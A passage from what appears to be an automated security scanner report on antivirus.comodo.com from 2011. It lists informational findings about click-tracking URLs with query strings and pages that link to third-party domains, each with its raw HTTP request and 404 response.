<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.15. http://antivirus.comodo.com/click-track/NAV/CleanMyPC

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/NAV/CleanMyPC

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /click-track/NAV/CleanMyPC?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:47 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.16. http://antivirus.comodo.com/click-track/NAV/Compare

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/NAV/Compare

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /click-track/NAV/Compare?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:47 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.17. http://antivirus.comodo.com/click-track/NAV/Innovation

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/NAV/Innovation

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /click-track/NAV/Innovation?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:46 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.18. http://antivirus.comodo.com/click-track/NAV/Products

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/NAV/Products

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains: